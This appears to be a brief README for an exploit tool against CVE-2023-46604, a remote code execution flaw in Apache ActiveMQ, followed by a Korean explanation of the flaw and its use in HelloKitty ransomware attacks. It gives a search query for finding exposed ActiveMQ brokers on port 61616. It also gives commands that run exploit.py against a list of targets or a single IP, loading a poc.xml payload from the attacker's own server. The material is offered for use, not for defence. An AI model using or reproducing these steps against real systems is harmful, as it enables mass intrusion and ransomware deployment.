
CVE-2023-46604용 익스플로잇
CVE-2023-46604용 익스플로잇
product:"ActiveMQ" port:"61616"
for read targets from the file:
python3 exploit.py -f targets -c http://YourVPS/poc.xml
---
single target:
python3 exploit.py -ip IP -c http://YourVPS/poc.xml
CVE-2023-46604는 오픈소스 메시지 브로커 소프트웨어인 Apache ActiveMQ의 심각한 원격 코드 실행 취약점입니다. 이 취약점을 통해 Java 기반 OpenWire 브로커 또는 클라이언트에 네트워크 접근 권한이 있는 원격 공격자가 임의의 셸 명령을 실행할 수 있습니다. 이는 OpenWire 프로토콜에서 직렬화된 클래스 유형을 조작하여 브로커가 클래스패스의 모든 클래스를 인스턴스화하도록 함으로써 달성됩니다. 이 취약점은 Apache ActiveMQ 내부의 안전하지 않은 역직렬화로 인해 발생하며, HelloKitty 랜섬웨어 계열을 포함한 공격자들이 랜섬웨어 바이너리를 실행하고 시스템을 완전히 손상시키는 데 악용되었습니다.